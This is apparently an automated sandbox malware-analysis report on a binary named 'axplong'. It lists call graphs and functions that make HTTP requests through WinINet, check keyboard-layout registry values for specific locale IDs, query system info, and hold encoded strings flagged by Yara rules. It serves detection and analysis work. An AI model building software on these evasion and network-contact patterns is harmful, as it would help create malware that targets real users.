12789 2e68bd 2 API calls 12787->12789 12790 2e69a6 ___free_lconv_mon 12789->12790 12495 2be410 12496 2be435 12495->12496 12498 2be419 12495->12498 12498->12496 12499 2be270 12498->12499 12500 2be280 __dosmaperr 12499->12500 12501 2e8979 2 API calls 12500->12501 12503 2be2bd std::_Xinvalid_argument 12501->12503 12502 2be435 12502->12498 12503->12502 12504 2be270 2 API calls 12503->12504 12504->12503 12581 2b86b0 12582 2b86b6 12581->12582 12583 2b86d6 12582->12583 12584 2e66e7 2 API calls 12582->12584 12585 2b86d0 12584->12585 12895 2bdfd0 recv 12896 2be032 recv 12895->12896 12897 2be067 recv 12896->12897 12898 2be0a1 12897->12898 12899 2be1c3 12898->12899 12900 2cc5dc GetSystemTimePreciseAsFileTime 12898->12900 12901 2be1fe 12900->12901 12902 2cc19a 7 API calls 12901->12902 12903 2be268 12902->12903 12376 2c1dd0 12379 2c1e6b shared_ptr __dosmaperr 12376->12379 12377 2be440 5 API calls 12378 2c2936 shared_ptr std::_Xinvalid_argument 12377->12378 12379->12378 12386 2c1e78 12379->12386 12391 2e8979 12379->12391 12381 2c2265 shared_ptr 12381->12378 12381->12386 12395 2e66e7 12381->12395 12383 2c268b shared_ptr __dosmaperr 12383->12378 12384 2e8979 2 API calls 12383->12384 12385 2c2759 12384->12385 12385->12378 12385->12386 12387 2c27d1 12385->12387 12386->12377 12399 2be440 12387->12399 12389 2c2843 12389->12378 12412 2b5df0 12389->12412 12392 2e8994 12391->12392 12419 2e86d7 12392->12419 12394 2e899e 12394->12381 12397 2e66f3 12395->12397 12396 2e66fd __cftof __dosmaperr 12396->12383 12397->12396 12443 2e6670 12397->12443 12400 2be489 12399->12400 12466 2bbd60 12400->12466 12402 2be9a9 shared_ptr 12402->12389 12403 2be711 12403->12402 12404 2be440 5 API calls 12403->12404 12406 2bf696 12404->12406 12405 2bf892 shared_ptr 12405->12389 12406->12405 12407 2be440 5 API calls 12406->12407 12409 2bf973 12407->12409 12408 2bfa45 shared_ptr 12408->12389 12409->12408 12410 2be440 5 API calls 12409->12410 12411 2c054c shared_ptr 12410->12411 12411->12389 12414 2b5e28 12412->12414 12413 2b5f0e shared_ptr 12413->12378 12414->12413 12415 2b6060 RegOpenKeyExA 12414->12415 12417 2b645a shared_ptr 12415->12417 12418 2b60b3 __cftof 12415->12418 12416 2b6153 RegEnumValueW 12416->12418 12417->12378 12418->12416 12418->12417 12420 2e86e9 12419->12420 12421 2e683a __fassign 2 API calls 12420->12421 12422 2e86fe __cftof __dosmaperr 12420->12422 12423 2e872e 12421->12423 12422->12394 12423->12422 12425 2e8925 12423->12425 12426 2e8962 12425->12426 12427 2e8932 12425->12427 12436 2ed2e9 12426->12436 12430 2e8941 __fassign 12427->12430 12431 2ed30d 12427->12431 12430->12423 12432 2e683a __fassign 2 API calls 12431->12432 12433 2ed32a 12432->12433 12435 2ed33a 12433->12435 12440 2ef07f 12433->12440 12435->12430 12437 2ed2f4 12436->12437 12438 2eb4bb __fassign 2 API calls 12437->12438 12439 2ed304 12438->12439 12439->12430 12441 2e683a __fassign 2 API calls 12440->12441 12442 2ef09f __cftof __fassign __freea 12441->12442 12442->12435 12444 2e6692 12443->12444 12446 2e667d __cftof __dosmaperr ___free_lconv_mon 12443->12446 12444->12446 12447 2e9ef9 12444->12447 12446->12396 12448 2e9f11 12447->12448 12450 2e9f36 12447->12450 12448->12450 12451 2f02f8 12448->12451 12450->12446 12452 2f0304 12451->12452 12454 2f030c __cftof __dosmaperr 12452->12454 12455 2f03ea 12452->12455 12454->12450 12456 2f040c 12455->12456 12458 2f0410 __cftof __dosmaperr 12455->12458 12456->12458 12459 2efb7f 12456->12459 12458->12454 12460 2efbcc 12459->12460 12461 2e683a __fassign 2 API calls 12460->12461 12465 2efbdb __cftof 12461->12465 12462 2efe7b 12462->12458 12463 2ed2e9 2 API calls 12463->12465 12464 2ec4ea GetPEB GetPEB __fassign 12464->12465 12465->12462 12465->12463 12465->12464 12467 2bbdb2 12466->12467 12469 2bc14e shared_ptr 12466->12469 12468 2bbdc6 InternetOpenW InternetConnectA 12467->12468 12467->12469 12470 2bbe3d 12468->12470 12469->12403 12471 2bbe53 HttpOpenRequestA 12470->12471 12472 2bbe71 shared_ptr 12471->12472 12473 2bbf13 HttpSendRequestA 12472->12473 12475 2bbf2b shared_ptr 12473->12475 12474 2bbfb3 InternetReadFile 12476 2bbfda 12474->12476 12475->12474 12780 2c9310 12781 2c9325 12780->12781 12782 2c9363 12780->12782 12783 2cd041 SleepConditionVariableCS 12781->12783 12784 2c932f 12783->12784 12784->12782 12785 2ccff7 RtlWakeAllConditionVariable 12784->12785 12785->12782

                            Executed Functions

                            Function 002BBD60 Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 310networkfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 760 2bbd60-2bbdac 761 2bbdb2-2bbdb6 760->761 762 2bc1a1-2bc1c6 call 2c7f30 760->762 761->762 763 2bbdbc-2bbdc0 761->763 768 2bc1c8-2bc1d4 762->768 769 2bc1f4-2bc20c 762->769 763->762 765 2bbdc6-2bbe4f InternetOpenW InternetConnectA call 2c7870 call 2b5b20 763->765 793 2bbe53-2bbe6f HttpOpenRequestA 765->793 794 2bbe51 765->794 773 2bc1ea-2bc1f1 call 2cd593 768->773 774 2bc1d6-2bc1e4 768->774 770 2bc158-2bc170 769->770 771 2bc212-2bc21e 769->771 778 2bc243-2bc25f call 2ccf21 770->778 779 2bc176-2bc182 770->779 776 2bc14e-2bc155 call 2cd593 771->776 777 2bc224-2bc232 771->777 773->769 774->773 781 2bc26f-2bc274 call 2e6b9a 774->781 776->770 777->781 784 2bc234 777->784 785 2bc239-2bc240 call 2cd593 779->785 786 2bc188-2bc196 779->786 784->776 785->778 786->781 792 2bc19c 786->792 792->785 798 2bbe71-2bbe80 793->798 799 2bbea0-2bbf0f call 2c7870 call 2b5b20 call 2c7870 call 2b5b20 793->799 794->793 801 2bbe82-2bbe90 798->801 802 2bbe96-2bbe9d call 2cd593 798->802 812 2bbf13-2bbf29 HttpSendRequestA 799->812 813 2bbf11 799->813 801->802 802->799 814 2bbf2b-2bbf3a 812->814 815 2bbf5a-2bbf82 812->815 813->812 818 2bbf3c-2bbf4a 814->818 819 2bbf50-2bbf57 call 2cd593 814->819 816 2bbfb3-2bbfd4 InternetReadFile 815->816 817 2bbf84-2bbf93 815->817 822 2bbfda 816->822 820 2bbfa9-2bbfb0 call 2cd593 817->820 821 2bbf95-2bbfa3 817->821 818->819 819->815 820->816 821->820 826 2bbfe0-2bc090 call 2e4180 822->826
                            APIs
                            • InternetOpenW.WININET(00308D70,00000000,00000000,00000000,00000000), ref: 002BBDED
                            • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 002BBE11
                            • HttpOpenRequestA.WININET(?,00000000), ref: 002BBE5B
                            • HttpSendRequestA.WININET(?,00000000), ref: 002BBF1B
                            • InternetReadFile.WININET(?,?,000003FF,?), ref: 002BBFCD
                            • InternetCloseHandle.WININET(?), ref: 002BC0A7
                            • InternetCloseHandle.WININET(?), ref: 002BC0AF
                            • InternetCloseHandle.WININET(?), ref: 002BC0B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                            • String ID: 0$8KG0fCKZFzY=$8KG0fymoFx==$@$RHYTYv==$RpKt$d41$invalid stoi argument$stoi argument out of range
                            • API String ID: 688256393-3706228242
                            • Opcode ID: 7e0e19bc6a8fa6cf2822411288ddaaf3dc6196fc5431fa0691330f47a9750e10
                            • Instruction ID: 1e06aff6be7718910f272956000be99078cb2b7d8b407d5798250795e05543f1
                            • Opcode Fuzzy Hash: 7e0e19bc6a8fa6cf2822411288ddaaf3dc6196fc5431fa0691330f47a9750e10
                            • Instruction Fuzzy Hash: 90B1E5B16201189BEB29DF28CC85BEEBB79EF45344F5041ADF50897282D7719AD0CF94
                            Function 002C46C0 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 002C7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 002C795C
                              • Part of subcall function 002C7870: __Cnd_destroy_in_situ.LIBCPMT ref: 002C7968
                              • Part of subcall function 002C7870: __Mtx_destroy_in_situ.LIBCPMT ref: 002C7971
                              • Part of subcall function 002BBD60: InternetOpenW.WININET(00308D70,00000000,00000000,00000000,00000000), ref: 002BBDED
                              • Part of subcall function 002BBD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 002BBE11
                              • Part of subcall function 002BBD60: HttpOpenRequestA.WININET(?,00000000), ref: 002BBE5B
                            • std::_Xinvalid_argument.LIBCPMT ref: 002C4EA2
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                            • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-1
                            • API String ID: 2414744145-770670542
                            • Opcode ID: d6ca47de548b0d4e3a4c7aef008bd68d7f3e8298a75e681806d904ee5a97c570
                            • Instruction ID: 438616c867a9d31760a0d36af66050e5e184b0c858123581563aabe03be6fefe
                            • Opcode Fuzzy Hash: d6ca47de548b0d4e3a4c7aef008bd68d7f3e8298a75e681806d904ee5a97c570
                            • Instruction Fuzzy Hash: 212335709201589BEB19DB28CD89B9DBB769F85304F5482DCE009AB2C2DB359FE4CF51
                            Function 002B5DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 915 2b5df0-2b5eee 921 2b5f18-2b5f25 call 2ccf21 915->921 922 2b5ef0-2b5efc 915->922 923 2b5f0e-2b5f15 call 2cd593 922->923 924 2b5efe-2b5f0c 922->924 923->921 924->923 927 2b5f26-2b60ad call 2e6b9a call 2ce080 call 2c7f30 * 5 RegOpenKeyExA 924->927 944 2b6478-2b6481 927->944 945 2b60b3-2b6143 call 2e4020 927->945 947 2b64ae-2b64b7 944->947 948 2b6483-2b648e 944->948 971 2b6149-2b614d 945->971 972 2b6466-2b6472 945->972 949 2b64b9-2b64c4 947->949 950 2b64e4-2b64ed 947->950 952 2b6490-2b649e 948->952 953 2b64a4-2b64ab call 2cd593 948->953 954 2b64da-2b64e1 call 2cd593 949->954 955 2b64c6-2b64d4 949->955 956 2b651a-2b6523 950->956 957 2b64ef-2b64fa 950->957 952->953 958 2b659e-2b65a3 call 2e6b9a 952->958 953->947 954->950 955->954 955->958 965 2b654c-2b6555 956->965 966 2b6525-2b6530 956->966 962 2b64fc-2b650a 957->962 963 2b6510-2b6517 call 2cd593 957->963 962->958 962->963 963->956 968 2b6582-2b659d call 2ccf21 965->968 969 2b6557-2b6566 965->969 975 2b6542-2b6549 call 2cd593 966->975 976 2b6532-2b6540 966->976 977 2b6578-2b657f call 2cd593 969->977 978 2b6568-2b6576 969->978 979 2b6153-2b6187 RegEnumValueW 971->979 980 2b6460 971->980 972->944 975->965 976->958 976->975 977->968 978->958 978->977 986 2b644d-2b6454 979->986 987 2b618d-2b61ad 979->987 980->972 986->979 990 2b645a 986->990 992 2b61b0-2b61b9 987->992 990->980 992->992 993 2b61bb-2b624d call 2c7c50 call 2c8090 call 2c7870 * 2 call 2b5c60 992->993 993->986
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                            • API String ID: 0-3963862150
                            • Opcode ID: 1041502a045b2a6caeb03cf6bd32233fafd2bbf6b0501e4cd76fcec85d293510
                            • Instruction ID: 0f0475b0bfe0f711a3ed3198878ec702bc9db147abf677dbaa9dcdb397e023ad
                            • Opcode Fuzzy Hash: 1041502a045b2a6caeb03cf6bd32233fafd2bbf6b0501e4cd76fcec85d293510
                            • Instruction Fuzzy Hash: 10E1AD71910218ABEB25DFA4CC88BDEB779AF04344F5042D9E508A7291DB74ABD4CF91
                            Function 002B7D00 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 392COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1003 2b7d00-2b7d82 call 2e4020 1007 2b7d88-2b7db0 call 2c7870 call 2b5b20 1003->1007 1008 2b827e-2b829b call 2ccf21 1003->1008 1015 2b7db2 1007->1015 1016 2b7db4-2b7dd6 call 2c7870 call 2b5b20 1007->1016 1015->1016 1021 2b7dda-2b7df3 1016->1021 1022 2b7dd8 1016->1022 1025 2b7df5-2b7e04 1021->1025 1026 2b7e24-2b7e4f 1021->1026 1022->1021 1027 2b7e1a-2b7e21 call 2cd593 1025->1027 1028 2b7e06-2b7e14 1025->1028 1029 2b7e51-2b7e60 1026->1029 1030 2b7e80-2b7ea1 1026->1030 1027->1026 1028->1027 1031 2b829c call 2e6b9a 1028->1031 1033 2b7e62-2b7e70 1029->1033 1034 2b7e76-2b7e7d call 2cd593 1029->1034 1035 2b7ea3-2b7ea5 GetNativeSystemInfo 1030->1035 1036 2b7ea7-2b7eac 1030->1036 1044 2b82a1-2b82a6 call 2e6b9a 1031->1044 1033->1031 1033->1034 1034->1030 1040 2b7ead-2b7eb6 1035->1040 1036->1040 1042 2b7eb8-2b7ebf 1040->1042 1043 2b7ed4-2b7ed7 1040->1043 1046 2b8279 1042->1046 1047 2b7ec5-2b7ecf 1042->1047 1048 2b821f-2b8222 1043->1048 1049 2b7edd-2b7ee6 1043->1049 1046->1008 1051 2b8274 1047->1051 1048->1046 1054 2b8224-2b822d 1048->1054 1052 2b7ef9-2b7efc 1049->1052 1053 2b7ee8-2b7ef4 1049->1053 1051->1046 1056 2b81fc-2b81fe 1052->1056 1057 2b7f02-2b7f09 1052->1057 1053->1051 1058 2b822f-2b8233 1054->1058 1059 2b8254-2b8257 1054->1059 1060 2b820c-2b820f 1056->1060 1061 2b8200-2b820a 1056->1061 1062 2b7fe9-2b81e5 call 2c7870 call 2b5b20 call 2c7870 call 2b5b20 call 2b5c60 call 2c7870 call 2b5b20 call 2b5640 call 2c7870 call 2b5b20 call 2c7870 call 2b5b20 call 2b5c60 call 2c7870 call 2b5b20 call 2b5640 call 2c7870 call 2b5b20 call 2c7870 call 2b5b20 call 2b5c60 call 2c7870 call 2b5b20 call 2b5640 1057->1062 1063 2b7f0f-2b7f6b call 2c7870 call 2b5b20 call 2c7870 call 2b5b20 call 2b5c60 1057->1063 1064 2b8248-2b8252 1058->1064 1065 2b8235-2b823a 1058->1065 1066 2b8259-2b8263 1059->1066 1067 2b8265-2b8271 1059->1067 1060->1046 1069 2b8211-2b821d 1060->1069 1061->1051 1102 2b81eb-2b81f4 1062->1102 1088 2b7f70-2b7f77 1063->1088 1064->1046 1065->1064 1071 2b823c-2b8246 1065->1071 1066->1046 1067->1051 1069->1051 1071->1046 1090 2b7f7b-2b7f9b call 2e8a81 1088->1090 1091 2b7f79 1088->1091 1097 2b7f9d-2b7fac 1090->1097 1098 2b7fd2-2b7fd4 1090->1098 1091->1090 1100 2b7fae-2b7fbc 1097->1100 1101 2b7fc2-2b7fcf call 2cd593 1097->1101 1098->1102 1103 2b7fda-2b7fe4 1098->1103 1100->1044 1100->1101 1101->1098 1102->1048 1105 2b81f6 1102->1105 1103->1102 1105->1056
                            APIs
                            • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002B7EA3
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoNativeSystem
                            • String ID: 8$JmpxQb==$JmpxRL==$JmpyPb==$X
                            • API String ID: 1721193555-4251415508
                            • Opcode ID: d2b1708fb0addb7403afdcba34f9299277edb83b7fd348a9b0dda4c7dadd17ff
                            • Instruction ID: ca4e4b2fb5032e3ed0f8b21861718404108ef87fa07f2ada8845e61ad44b117b
                            • Opcode Fuzzy Hash: d2b1708fb0addb7403afdcba34f9299277edb83b7fd348a9b0dda4c7dadd17ff
                            • Instruction Fuzzy Hash: 4CD13570E206549BDF15BF28CC4A7DD7B65AB46350F90429CE8196B3C2DB358EB08BD2
                            Function 002B82B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 159COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1141 2b82b0-2b8331 call 2e4020 1145 2b833d-2b8365 call 2c7870 call 2b5b20 1141->1145 1146 2b8333-2b8338 1141->1146 1154 2b8369-2b838b call 2c7870 call 2b5b20 1145->1154 1155 2b8367 1145->1155 1147 2b847f-2b849b call 2ccf21 1146->1147 1160 2b838f-2b83a8 1154->1160 1161 2b838d 1154->1161 1155->1154 1164 2b83aa-2b83b9 1160->1164 1165 2b83d9-2b8404 1160->1165 1161->1160 1168 2b83bb-2b83c9 1164->1168 1169 2b83cf-2b83d6 call 2cd593 1164->1169 1166 2b8431-2b8452 1165->1166 1167 2b8406-2b8415 1165->1167 1172 2b8458-2b845d 1166->1172 1173 2b8454-2b8456 GetNativeSystemInfo 1166->1173 1170 2b8427-2b842e call 2cd593 1167->1170 1171 2b8417-2b8425 1167->1171 1168->1169 1174 2b849c-2b84a1 call 2e6b9a 1168->1174 1169->1165 1170->1166 1171->1170 1171->1174 1178 2b845e-2b8465 1172->1178 1173->1178 1178->1147 1183 2b8467-2b846f 1178->1183 1184 2b8478-2b847b 1183->1184 1185 2b8471-2b8476 1183->1185 1184->1147 1186 2b847d 1184->1186 1185->1147 1186->1147
                            APIs
                            • GetNativeSystemInfo.KERNELBASE(?), ref: 002B8454
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoNativeSystem
                            • String ID: 8$X
                            • API String ID: 1721193555-374791910
                            • Opcode ID: 045ab10928cac677c9b5118cc07746536f8679f714b39baf341061cc86d29184
                            • Instruction ID: 81e95bc66f84c4352145a83eb5384b931df6f6bb4bcedaefc69b907bcb082237
                            • Opcode Fuzzy Hash: 045ab10928cac677c9b5118cc07746536f8679f714b39baf341061cc86d29184
                            • Instruction Fuzzy Hash: B4514C70D202199BEB14EF24CD45BDEB779EB45344F5042A9E808A72C1EF715AE0CF91
                            Function 002E6E01 Relevance: 4.6, APIs: 3, Instructions: 145COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1187 2e6e01-2e6e36 GetFileType 1188 2e6eee-2e6ef1 1187->1188 1189 2e6e3c-2e6e47 1187->1189 1192 2e6f1a-2e6f42 1188->1192 1193 2e6ef3-2e6ef6 1188->1193 1190 2e6e69-2e6e85 call 2e4020 GetFileInformationByHandle 1189->1190 1191 2e6e49-2e6e5a call 2e7177 1189->1191 1203 2e6f0b-2e6f18 call 2e740d 1190->1203 1208 2e6e8b-2e6ecd call 2e70c9 call 2e6f71 * 3 1190->1208 1205 2e6f07-2e6f09 1191->1205 1206 2e6e60-2e6e67 1191->1206 1194 2e6f5f-2e6f61 1192->1194 1195 2e6f44-2e6f57 1192->1195 1193->1192 1198 2e6ef8-2e6efa 1193->1198 1200 2e6f62-2e6f70 call 2ccf21 1194->1200 1195->1194 1210 2e6f59-2e6f5c 1195->1210 1202 2e6efc-2e6f01 call 2e7443 1198->1202 1198->1203 1202->1205 1203->1205 1205->1200 1206->1190 1223 2e6ed2-2e6eea call 2e7096 1208->1223 1210->1194 1223->1194 1226 2e6eec 1223->1226 1226->1205
                            APIs
                            • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 002E6E23
                            • GetFileInformationByHandle.KERNELBASE(?,?), ref: 002E6E7D
                            • __dosmaperr.LIBCMT ref: 002E6F12
                              • Part of subcall function 002E7177: __dosmaperr.LIBCMT ref: 002E71AC
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: File__dosmaperr$HandleInformationType
                            • String ID:
                            • API String ID: 2531987475-0
                            • Opcode ID: a2a5d2619c1f778cd7a54b0f31462c3cf18e9f5f4870a76ba20fd1fb7c81320a
                            • Instruction ID: 82449bb143fe3c34f5b3a6c6b661611d69e085c0228990ca6e6f06e61e225894
                            • Opcode Fuzzy Hash: a2a5d2619c1f778cd7a54b0f31462c3cf18e9f5f4870a76ba20fd1fb7c81320a
